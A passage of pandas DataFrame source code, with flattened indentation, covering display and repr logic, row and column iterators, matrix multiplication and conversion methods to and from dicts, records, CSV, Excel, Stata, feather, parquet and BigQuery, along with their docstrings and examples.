if ((max_columns and nb_columns > max_columns) or
((not ignore_width) and width and nb_columns > (width // 2))):
return False
# used by repr_html under IPython notebook or scripts ignore terminal
# dims
if ignore_width or not com.in_interactive_session():
return True
if (get_option('display.width') is not None or
com.in_ipython_frontend()):
# check at least the column row for excessive width
max_rows = 1
else:
max_rows = get_option("display.max_rows")
# when auto-detecting, so width=None and not in ipython front end
# check whether repr fits horizontal by actually checking
# the width of the rendered repr
buf = StringIO()
# only care about the stuff we'll actually print out
# and to_string on entire frame may be expensive
d = self
if max_rows is not None:
# truncate to the rows that would actually be rendered
d = d.iloc[:min(max_rows, len(d))]
else:
return True
d.to_string(buf=buf)
value = buf.getvalue()
repr_width = max(len(l) for l in value.split('\n'))
return repr_width < width
def _info_repr(self):
"""True if the repr should show the info view."""
info_repr_option = (get_option("display.large_repr") == "info")
return info_repr_option and not (self._repr_fits_horizontal_() and
self._repr_fits_vertical_())
def __unicode__(self):
"""
Return a string representation for a particular DataFrame
Invoked by unicode(df) in py2 only. Yields a Unicode String in both
py2/py3.
"""
buf = StringIO(u(""))
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(buf=buf, max_rows=max_rows, max_cols=max_cols,
line_width=width, show_dimensions=show_dimensions)
return buf.getvalue()
def _repr_html_(self):
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
# qtconsole doesn't report its line width, and also
# behaves badly when outputting an HTML table
# that doesn't fit the window, so disable it.
# XXX: In IPython 3.x and above, the Qt console will not attempt to
# display HTML, so this check can be removed when support for
# IPython 2.x is no longer needed.
if com.in_qtconsole():
# 'HTML output is disabled in QtConsole'
return None
if self._info_repr():
buf = StringIO(u(""))
self.info(buf=buf)
# need to escape the <class>, should be the first line.
val = buf.getvalue().replace('<', r'&lt;', 1)
val = val.replace('>', r'&gt;', 1)
return '<pre>' + val + '</pre>'
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
return self.to_html(max_rows=max_rows, max_cols=max_cols,
show_dimensions=show_dimensions, notebook=True)
else:
return None
@property
def style(self):
"""
Property returning a Styler object containing methods for
building a styled HTML representation of the DataFrame.
See Also
--------
pandas.io.formats.style.Styler
"""
from pandas.io.formats.style import Styler
return Styler(self)
def iteritems(self):
"""
Iterator over (column name, Series) pairs.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
itertuples : Iterate over DataFrame rows as namedtuples of the values.
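Examples
--------
A minimal sketch:
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> for label, content in df.iteritems():
... print(label)
col1
col2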
"""
if self.columns.is_unique and hasattr(self, '_item_cache'):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
def iterrows(self):
"""
Iterate over DataFrame rows as (index, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
Returns
-------
it : generator
A generator that iterates over the rows of the frame.
See also
--------
itertuples : Iterate over DataFrame rows as namedtuples of the values.
iteritems : Iterate over (column name, Series) pairs.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index=True, name="Pandas"):
"""
Iterate over DataFrame rows as namedtuples, with index value as first
element of the tuple.
Parameters
----------
index : boolean, default True
If True, return the index as the first element of the tuple.
name : string, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
With a large number of columns (>255), regular tuples are returned.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
iteritems : Iterate over (column name, Series) pairs.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
... index=['a', 'b'])
>>> df
col1 col2
a 1 0.1
b 2 0.2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='a', col1=1, col2=0.10000000000000001)
Pandas(Index='b', col1=2, col2=0.20000000000000001)
"""
arrays = []
fields = []
if index:
arrays.append(self.index)
fields.append("Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
# Python 3 supports at most 255 arguments to constructor, and
# things get slow with this many fields in Python 2
if name is not None and len(self.columns) + index < 256:
# `rename` is unsupported in Python 2.6
try:
itertuple = collections.namedtuple(name,
fields + list(self.columns),
rename=True)
return map(itertuple._make, zip(*arrays))
except Exception:
pass
# fallback to regular tuples
return zip(*arrays)
items = iteritems
def __len__(self):
"""Returns length of info axis, but here we use the index """
return len(self.index)
def dot(self, other):
"""
Matrix multiplication with DataFrame or Series objects
Parameters
----------
other : DataFrame or Series
Returns
-------
dot_product : DataFrame or Series
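Examples
--------
A minimal sketch (alignment is on the columns of the caller and the
index of `other`; output shown is indicative):
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['a', 'b'])
>>> other = pd.DataFrame([[5, 6], [7, 8]], index=['a', 'b'])
>>> df.dot(other)
0 1
0 19 22
1 43 50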
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if (len(common) > len(self.columns) or
len(common) > len(other.index)):
raise ValueError('matrices are not aligned')
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError('Dot product shape mismatch, %s vs %s' %
(lvals.shape, rvals.shape))
if isinstance(other, DataFrame):
return self._constructor(np.dot(lvals, rvals), index=left.index,
columns=other.columns)
elif isinstance(other, Series):
return Series(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return Series(result, index=left.index)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient='columns', dtype=None):
"""
Construct DataFrame from dict of array-like or dicts
Parameters
----------
data : dict
{field : array-like} or {field : dict}
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
DataFrame
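Examples
--------
A minimal sketch with the default orient='columns' (keys become columns):
>>> data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d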
"""
index, columns = None, None
orient = orient.lower()
if orient == 'index':
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient != 'columns': # pragma: no cover
raise ValueError('only recognize index or columns for orient')
return cls(data, index=index, columns=columns, dtype=dtype)
def to_dict(self, orient='dict', into=dict):
"""Convert DataFrame to dictionary.
Parameters
----------
orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
Determines the type of the values of the dictionary.
- dict (default) : dict like {column -> {index -> value}}
- list : dict like {column -> [values]}
- series : dict like {column -> Series(values)}
- split : dict like
{index -> [index], columns -> [columns], data -> [values]}
- records : list like
[{column -> value}, ... , {column -> value}]
- index : dict like {index -> {column -> value}}
Abbreviations are allowed. `s` indicates `series` and `sp`
indicates `split`.
into : class, default dict
The collections.Mapping subclass used for all Mappings
in the return value. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
.. versionadded:: 0.21.0
Returns
-------
result : collections.Mapping like {column -> {index -> value}}
Examples
--------
>>> df = pd.DataFrame(
... {'col1': [1, 2], 'col2': [0.5, 0.75]}, index=['a', 'b'])
>>> df
col1 col2
a 1 0.50
b 2 0.75
>>> df.to_dict()
{'col1': {'a': 1, 'b': 2}, 'col2': {'a': 0.5, 'b': 0.75}}
You can specify the return orientation.
>>> df.to_dict('series')
{'col1': a 1
b 2
Name: col1, dtype: int64, 'col2': a 0.50
b 0.75
Name: col2, dtype: float64}
>>> df.to_dict('split')
{'columns': ['col1', 'col2'],
'data': [[1.0, 0.5], [2.0, 0.75]],
'index': ['a', 'b']}
>>> df.to_dict('records')
[{'col1': 1.0, 'col2': 0.5}, {'col1': 2.0, 'col2': 0.75}]
>>> df.to_dict('index')
{'a': {'col1': 1.0, 'col2': 0.5}, 'b': {'col1': 2.0, 'col2': 0.75}}
You can also specify the mapping type.
>>> from collections import OrderedDict, defaultdict
>>> df.to_dict(into=OrderedDict)
OrderedDict([('col1', OrderedDict([('a', 1), ('b', 2)])),
('col2', OrderedDict([('a', 0.5), ('b', 0.75)]))])
If you want a `defaultdict`, you need to initialize it:
>>> dd = defaultdict(list)
>>> df.to_dict('records', into=dd)
[defaultdict(<type 'list'>, {'col2': 0.5, 'col1': 1.0}),
defaultdict(<type 'list'>, {'col2': 0.75, 'col1': 2.0})]
"""
if not self.columns.is_unique:
warnings.warn("DataFrame columns are not unique, some "
"columns will be omitted.", UserWarning,
stacklevel=2)
# GH16122
into_c = standardize_mapping(into)
if orient.lower().startswith('d'):
return into_c(
(k, v.to_dict(into)) for k, v in compat.iteritems(self))
elif orient.lower().startswith('l'):
return into_c((k, v.tolist()) for k, v in compat.iteritems(self))
elif orient.lower().startswith('sp'):
return into_c((('index', self.index.tolist()),
('columns', self.columns.tolist()),
('data', lib.map_infer(self.values.ravel(),
_maybe_box_datetimelike)
.reshape(self.values.shape).tolist())))
elif orient.lower().startswith('s'):
return into_c((k, _maybe_box_datetimelike(v))
for k, v in compat.iteritems(self))
elif orient.lower().startswith('r'):
return [into_c((k, _maybe_box_datetimelike(v))
for k, v in zip(self.columns, np.atleast_1d(row)))
for row in self.values]
elif orient.lower().startswith('i'):
return into_c((k, v.to_dict(into)) for k, v in self.iterrows())
else:
raise ValueError("orient '%s' not understood" % orient)
def to_gbq(self, destination_table, project_id, chunksize=10000,
verbose=True, reauth=False, if_exists='fail', private_key=None):
"""Write a DataFrame to a Google BigQuery table.
The main method a user calls to export pandas DataFrame contents to
Google BigQuery table.
Google BigQuery API Client Library v2 for Python is used.
Documentation is available `here
<https://developers.google.com/api-client-library/python/apis/bigquery/v2>`__
Authentication to the Google BigQuery service is via OAuth 2.0.
- If "private_key" is not provided:
By default "application default credentials" are used.
If default application credentials are not found or are restrictive,
user account credentials are used. In this case, you will be asked to
grant permissions for product name 'pandas GBQ'.
- If "private_key" is provided:
Service account credentials will be used to authenticate.
Parameters
----------
dataframe : DataFrame
DataFrame to be written
destination_table : string
Name of table to be written, in the form 'dataset.tablename'
project_id : str
Google BigQuery Account project ID.
chunksize : int (default 10000)
Number of rows to be inserted in each chunk from the dataframe.
verbose : boolean (default True)
Show percentage complete
reauth : boolean (default False)
Force Google BigQuery to reauthenticate the user. This is useful
if multiple accounts are used.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
'fail': If table exists, do nothing.
'replace': If table exists, drop it, recreate it, and insert data.
'append': If table exists, insert data. Create if does not exist.
private_key : str (optional)
Service account private key in JSON format. Can be file path
or string contents. This is useful for remote server
authentication (eg. jupyter iPython notebook on remote host)
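Examples
--------
A minimal sketch (assumes the pandas-gbq dependency is installed and
BigQuery credentials are available; the dataset/table and project names
are placeholders, so the call is not executed here):
>>> df.to_gbq('my_dataset.my_table', 'my-project-id')  # doctest: +SKIP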
"""
from pandas.io import gbq
return gbq.to_gbq(self, destination_table, project_id=project_id,
chunksize=chunksize, verbose=verbose, reauth=reauth,
if_exists=if_exists, private_key=private_key)
@classmethod
def from_records(cls, data, index=None, exclude=None, columns=None,
coerce_float=False, nrows=None):
"""
Convert structured or record ndarray to DataFrame
Parameters
----------
data : ndarray (structured dtype), list of tuples, dict, or DataFrame
index : string, list of fields, array-like
Field of array to use as the index, alternately a specific set of
input labels to use
exclude : sequence, default None
Columns or fields to exclude
columns : sequence, default None
Column names to use. If the passed data do not have names
associated with them, this argument provides names for the
columns. Otherwise this argument indicates the order of the columns
in the result (any names not found in the data will become all-NA
columns)
coerce_float : boolean, default False
Attempt to convert values of non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
Returns
-------
df : DataFrame
"""
# Make a copy of the input columns so we can modify it
if columns is not None:
columns = _ensure_index(columns)
if is_iterator(data):
if nrows == 0:
return cls()
try:
first_row = next(data)
except StopIteration:
return cls(index=index, columns=columns)
dtype = None
if hasattr(first_row, 'dtype') and first_row.dtype.names:
dtype = first_row.dtype
values = [first_row]
if nrows is None:
values += data
else:
values.extend(itertools.islice(data, nrows - 1))
if dtype is not None:
data = np.array(values, dtype=dtype)
else:
data = values
if isinstance(data, dict):
if columns is None:
columns = arr_columns = _ensure_index(sorted(data))
arrays = [data[k] for k in columns]
else:
arrays = []
arr_columns = []
for k, v in compat.iteritems(data):
if k in columns:
arr_columns.append(k)
arrays.append(v)
arrays, arr_columns = _reorder_arrays(arrays, arr_columns,
columns)
elif isinstance(data, (np.ndarray, DataFrame)):
arrays, columns = _to_arrays(data, columns)
if columns is not None:
columns = _ensure_index(columns)
arr_columns = columns
else:
arrays, arr_columns = _to_arrays(data, columns,
coerce_float=coerce_float)
arr_columns = _ensure_index(arr_columns)
if columns is not None:
columns = _ensure_index(columns)
else:
columns = arr_columns
if exclude is None:
exclude = set()
else:
exclude = set(exclude)
result_index = None
if index is not None:
if (isinstance(index, compat.string_types) or
not hasattr(index, "__iter__")):
i = columns.get_loc(index)
exclude.add(index)
if len(arrays) > 0:
result_index = Index(arrays[i], name=index)
else:
result_index = Index([], name=index)
else:
try:
to_remove = [arr_columns.get_loc(field) for field in index]
index_data = [arrays[i] for i in to_remove]
result_index = _ensure_index_from_sequences(index_data,
names=index)
exclude.update(index)
except Exception:
result_index = index
if any(exclude):
arr_exclude = [x for x in exclude if x in arr_columns]
to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
arr_columns = arr_columns.drop(arr_exclude)
columns = columns.drop(exclude)
mgr = _arrays_to_mgr(arrays, arr_columns, result_index, columns)
return cls(mgr)
def to_records(self, index=True, convert_datetime64=True):
"""
Convert DataFrame to record array. Index will be put in the
'index' field of the record array if requested
Parameters
----------
index : boolean, default True
Include index in resulting record array, stored in 'index' field
convert_datetime64 : boolean, default True
Whether to convert the index to datetime.datetime if it is a
DatetimeIndex
Returns
-------
y : recarray
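Examples
--------
A minimal sketch (the exact recarray repr can vary by numpy version):
>>> df = pd.DataFrame({'A': [1, 2], 'B': [0.5, 0.75]}, index=['a', 'b'])
>>> df.to_records()
rec.array([('a', 1, 0.5), ('b', 2, 0.75)],
dtype=[('index', 'O'), ('A', '<i8'), ('B', '<f8')])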
"""
if index:
if is_datetime64_any_dtype(self.index) and convert_datetime64:
ix_vals = [self.index.to_pydatetime()]
else:
if isinstance(self.index, MultiIndex):
# array of tuples to numpy cols. copy copy copy
ix_vals = lmap(np.array, zip(*self.index.values))
else:
ix_vals = [self.index.values]
arrays = ix_vals + [self[c].get_values() for c in self.columns]
count = 0
index_names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i, n in enumerate(index_names):
if n is None:
index_names[i] = 'level_%d' % count
count += 1
elif index_names[0] is None:
index_names = ['index']
names = (lmap(compat.text_type, index_names) +
lmap(compat.text_type, self.columns))
else:
arrays = [self[c].get_values() for c in self.columns]
names = lmap(compat.text_type, self.columns)
formats = [v.dtype for v in arrays]
return np.rec.fromarrays(
arrays,
dtype={'names': names, 'formats': formats}
)
@classmethod
def from_items(cls, items, columns=None, orient='columns'):
"""
Convert (key, value) pairs to DataFrame. The keys will be the axis
index (usually the columns, but depends on the specified
orientation). The values should be arrays or Series.
Parameters
----------
items : sequence of (key, value) pairs
Values should be arrays or Series.
columns : sequence of column labels, optional
Must be passed if orient='index'.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the
input correspond to column labels, pass 'columns'
(default). Otherwise if the keys correspond to the index,
pass 'index'.
Returns
-------
frame : DataFrame
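Examples
--------
A minimal sketch with the default orient='columns':
>>> pd.DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])])
A B
0 1 4
1 2 5
2 3 6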
"""
keys, values = lzip(*items)
if orient == 'columns':
if columns is not None:
columns = _ensure_index(columns)
idict = dict(items)
if len(idict) < len(items):
if not columns.equals(_ensure_index(keys)):
raise ValueError('With non-unique item names, passed '
'columns must be identical')
arrays = values
else:
arrays = [idict[k] for k in columns if k in idict]
else:
columns = _ensure_index(keys)
arrays = values
# GH 17312
# Provide more informative error msg when scalar values passed
try:
return cls._from_arrays(arrays, columns, None)
except ValueError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
elif orient == 'index':
if columns is None:
raise TypeError("Must pass columns with orient='index'")
keys = _ensure_index(keys)
# GH 17312
# Provide more informative error msg when scalar values passed
try:
arr = np.array(values, dtype=object).T
data = [lib.maybe_convert_objects(v) for v in arr]
return cls._from_arrays(data, columns, keys)
except TypeError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
else: # pragma: no cover
raise ValueError("'orient' must be either 'columns' or 'index'")
@classmethod
def _from_arrays(cls, arrays, columns, index, dtype=None):
mgr = _arrays_to_mgr(arrays, columns, index, columns, dtype=dtype)
return cls(mgr)
@classmethod
def from_csv(cls, path, header=0, sep=',', index_col=0, parse_dates=True,
encoding=None, tupleize_cols=None,
infer_datetime_format=False):
"""
Read CSV file (DEPRECATED, please use :func:`pandas.read_csv`
instead).
It is preferable to use the more powerful :func:`pandas.read_csv`
for most general purposes, but ``from_csv`` makes for an easy
roundtrip to and from a file (the exact counterpart of
``to_csv``), especially with a DataFrame of time series data.
This method only differs from the preferred :func:`pandas.read_csv`
in some defaults:
- `index_col` is ``0`` instead of ``None`` (take first column as index
by default)
- `parse_dates` is ``True`` instead of ``False`` (try parsing the index
as datetime by default)
So a ``pd.DataFrame.from_csv(path)`` can be replaced by
``pd.read_csv(path, index_col=0, parse_dates=True)``.
Parameters
----------
path : string file path or file handle / StringIO
header : int, default 0
Row to use as header (skip prior rows)
sep : string, default ','
Field delimiter
index_col : int or sequence, default 0
Column to use for index. If a sequence is given, a MultiIndex
is used. Different default from read_table
parse_dates : boolean, default True
Parse dates. Different default from read_table
tupleize_cols : boolean, default False
Write MultiIndex columns as a list of tuples (if True) or in
the new, expanded format (if False)
infer_datetime_format : boolean, default False
If True and `parse_dates` is True for a column, try to infer the
datetime format based on the first datetime string. If the format
can be inferred, there often will be a large parsing speed-up.
See also
--------
pandas.read_csv
Returns
-------
y : DataFrame
"""
warnings.warn("from_csv is deprecated. Please use read_csv(...) "
"instead. Note that some of the default arguments are "
"different, so please refer to the documentation "
"for from_csv when changing your function calls",
FutureWarning, stacklevel=2)
from pandas.io.parsers import read_table
return read_table(path, header=header, sep=sep,
parse_dates=parse_dates, index_col=index_col,
encoding=encoding, tupleize_cols=tupleize_cols,
infer_datetime_format=infer_datetime_format)
def to_sparse(self, fill_value=None, kind='block'):
"""
Convert to SparseDataFrame
Parameters
----------
fill_value : float, default NaN
kind : {'block', 'integer'}
Returns
-------
y : SparseDataFrame
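Examples
--------
A minimal sketch:
>>> df = pd.DataFrame({'A': [0, 1, 0], 'B': [0, 0, 1]})
>>> sdf = df.to_sparse(fill_value=0)
>>> type(sdf)
<class 'pandas.core.sparse.frame.SparseDataFrame'>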
"""
from pandas.core.sparse.frame import SparseDataFrame
return SparseDataFrame(self._series, index=self.index,
columns=self.columns, default_kind=kind,
default_fill_value=fill_value)
def to_panel(self):
"""
Transform long (stacked) format (DataFrame) into wide (3D, Panel)
format.
.. deprecated:: 0.20.0
Currently the index of the DataFrame must be a 2-level MultiIndex. This
may be generalized later
Returns
-------
panel : Panel
"""
# only support this kind for now
if (not isinstance(self.index, MultiIndex) or # pragma: no cover
len(self.index.levels) != 2):
raise NotImplementedError('Only 2-level MultiIndex are supported.')
if not self.index.is_unique:
raise ValueError("Can't convert non-uniquely indexed "
"DataFrame to Panel")
self._consolidate_inplace()
# minor axis must be sorted
if self.index.lexsort_depth < 2:
selfsorted = self.sort_index(level=0)
else:
selfsorted = self
major_axis, minor_axis = selfsorted.index.levels
major_labels, minor_labels = selfsorted.index.labels
shape = len(major_axis), len(minor_axis)
# preserve names, if any
major_axis = major_axis.copy()
major_axis.name = self.index.names[0]
minor_axis = minor_axis.copy()
minor_axis.name = self.index.names[1]
# create new axes
new_axes = [selfsorted.columns, major_axis, minor_axis]
# create new manager
new_mgr = selfsorted._data.reshape_nd(axes=new_axes,
labels=[major_labels,
minor_labels],
shape=shape,
ref_items=selfsorted.columns)
return self._constructor_expanddim(new_mgr)
def to_csv(self, path_or_buf=None, sep=",", na_rep='', float_format=None,
columns=None, header=True, index=True, index_label=None,
mode='w', encoding=None, compression=None, quoting=None,
quotechar='"', line_terminator='\n', chunksize=None,
tupleize_cols=None, date_format=None, doublequote=True,
escapechar=None, decimal='.'):
r"""Write DataFrame to a comma-separated values (csv) file
Parameters
----------
path_or_buf : string or file handle, default None
File path or object, if None is provided the result is returned as
a string.
sep : character, default ','
Field delimiter for the output file.
na_rep : string, default ''
Missing data representation
float_format : string, default None
Format string for floating point numbers
columns : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R
mode : str
Python write mode, default 'w'
encoding : string, optional
A string representing the encoding to use in the output file,
defaults to 'ascii' on Python 2 and 'utf-8' on Python 3.
compression : string, optional
a string representing the compression to use in the output file,
allowed values are 'gzip', 'bz2', 'xz',
only used when the first argument is a filename
line_terminator : string, default ``'\n'``
The newline character or character sequence to use in the output
file
quoting : optional constant from csv module
defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric
quotechar : string (length 1), default '\"'
character used to quote fields
doublequote : boolean, default True
Control quoting of `quotechar` inside a field
escapechar : string (length 1), default None
character used to escape `sep` and `quotechar` when appropriate
chunksize : int or None
rows to write at a time
tupleize_cols : boolean, default False
.. deprecated:: 0.21.0
This argument will be removed and will always write each row
of the multi-index as a separate row in the CSV file.
Write MultiIndex columns as a list of tuples (if True) or in
the new, expanded format, where each MultiIndex column is a row
in the CSV (if False).
date_format : string, default None
Format string for datetime objects
decimal: string, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data
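Examples
--------
A minimal sketch; with path_or_buf=None the CSV text is returned as a
string:
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple']},
... columns=['name', 'mask'])
>>> df.to_csv(index=False)
'name,mask\nRaphael,red\nDonatello,purple\n'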
"""
if tupleize_cols is not None:
warnings.warn("The 'tupleize_cols' parameter is deprecated and "
"will be removed in a future version",
FutureWarning, stacklevel=2)
else:
tupleize_cols = False
formatter = fmt.CSVFormatter(self, path_or_buf,
line_terminator=line_terminator, sep=sep,
encoding=encoding,
compression=compression, quoting=quoting,
na_rep=na_rep, float_format=float_format,
cols=columns, header=header, index=index,
index_label=index_label, mode=mode,
chunksize=chunksize, quotechar=quotechar,
tupleize_cols=tupleize_cols,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar, decimal=decimal)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
@Appender(_shared_docs['to_excel'] % _shared_doc_kwargs)
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
float_format=None, columns=None, header=True, index=True,
index_label=None, startrow=0, startcol=0, engine=None,
merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
freeze_panes=None):
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(self, na_rep=na_rep, cols=columns,
header=header,
float_format=float_format, index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep)
formatter.write(excel_writer, sheet_name=sheet_name, startrow=startrow,
startcol=startcol, freeze_panes=freeze_panes,
engine=engine)
def to_stata(self, fname, convert_dates=None, write_index=True,
encoding="latin-1", byteorder=None, time_stamp=None,
data_label=None, variable_labels=None):
"""
A class for writing Stata binary dta files from array-like objects
Parameters
----------
fname : str or buffer
String path of file-like object
convert_dates : dict
Dictionary mapping columns containing datetime types to stata
internal format to use when writing the dates. Options are 'tc',
'td', 'tm', 'tw', 'th', 'tq', 'ty'. Column can be either an integer
or a name. Datetime columns that do not have a conversion type
specified will be converted to 'tc'. Raises NotImplementedError if
a datetime column has timezone information
write_index : bool
Write the index to Stata dataset.
encoding : str
Default is latin-1. Unicode is not supported
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`
time_stamp : datetime
A datetime to use as file creation date. Default is the current
time.
data_label : str
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as
values. Each label must be 80 characters or smaller.
.. versionadded:: 0.19.0
Raises
------
NotImplementedError
* If datetimes contain timezone information
* Column dtype is not representable in Stata
ValueError
* Columns listed in convert_dates are neither datetime64[ns]
or datetime.datetime
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
.. versionadded:: 0.19.0
Examples
--------
>>> data.to_stata('./data_file.dta')
Or with dates
>>> data.to_stata('./date_data_file.dta', convert_dates={2: 'tw'})
"""
from pandas.io.stata import StataWriter
writer = StataWriter(fname, self, convert_dates=convert_dates,
encoding=encoding, byteorder=byteorder,
time_stamp=time_stamp, data_label=data_label,
write_index=write_index,
variable_labels=variable_labels)
writer.write_file()
def to_feather(self, fname):
"""
write out the binary feather-format for DataFrames
.. versionadded:: 0.20.0
Parameters
----------
fname : str
string file path
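Examples
--------
A minimal sketch (assumes the optional feather/pyarrow dependency is
installed; the file name is a placeholder, so the call is not executed
here):
>>> df = pd.DataFrame({'col1': [1, 2]})
>>> df.to_feather('df.feather')  # doctest: +SKIP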
"""
from pandas.io.feather_format import to_feather
to_feather(self, fname)
def to_parquet(self, fname, engine='auto', compression='snappy',
**kwargs):
"""
Write a DataFrame to the binary parquet format.
.. versionadded:: 0.21.0
Parameters
----------
fname : str
string file path
engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
Parquet library to use. If 'auto', then the option
'io.parquet.engine' is used; when that option is also 'auto',
the first available engine (pyarrow, then fastparquet) is used.
compression : str, optional, default 'snappy'
compression method, includes {'gzip', 'snappy', 'brotli'}
kwargs
Additional keyword arguments passed to the engine
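Examples
--------
A minimal sketch (assumes a parquet engine such as pyarrow or
fastparquet is installed; the file name is a placeholder, so the call is
not executed here):
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_parquet('df.parquet', compression='gzip')  # doctest: +SKIP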
"""
from pandas.io.parquet import to_parquet
to_parquet(self, fname, engine,
compression=compression, **kwargs)
@Substitution(header='Write out the column names. If a list of strings '
'is given, it is assumed to be aliases for the '
'column names')
@Appender(fmt.docstring_to_string, indents=1)
def to_string(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None,
line_width=None, max_rows=None, max_cols=None,
show_dimensions=False):
"""
Render a DataFrame to a console-friendly tabular output.
"""
formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
line_width=line_width,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions)
formatter.to_string()
if buf is None:
result = formatter.buf.getvalue()
return result
@Substitution(header='whether to print column labels, default True')
@Appender(fmt.docstring_to_string, indents=1)
def to_html(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None, bold_rows=True,
classes=None, escape=True, max_rows=None, max_cols=None,
show_dimensions=False, notebook=False, decimal='.',
border=None):
"""
Render a DataFrame as an HTML table.
`to_html`-specific options:
bold_rows : boolean, default True
Make the row labels bold in the output
classes : str or list or tuple, default None
CSS class(es) to apply to the resulting html table
escape : boolean, default True
Convert the characters <, >, and & to HTML-safe sequences.
max_rows : int, optional
Maximum number of rows to show before truncating. If None, show
all.
max_cols : int, optional
Maximum number of columns to show before truncating. If None, show
all.
decimal : string, default '.'
Character recognized as decimal separator, e.g. ',' in Europe
.. versionadded:: 0.18.0
border : int
A ``border=border`` attribute is included in the opening
`<table>` tag. Default ``pd.options.html.border``.
.. versionadded:: 0.19.0
"""
if (justify is not None and
justify not in fmt._VALID_JUSTIFY_PARAMETERS):
raise ValueError("Invalid value for justify parameter")
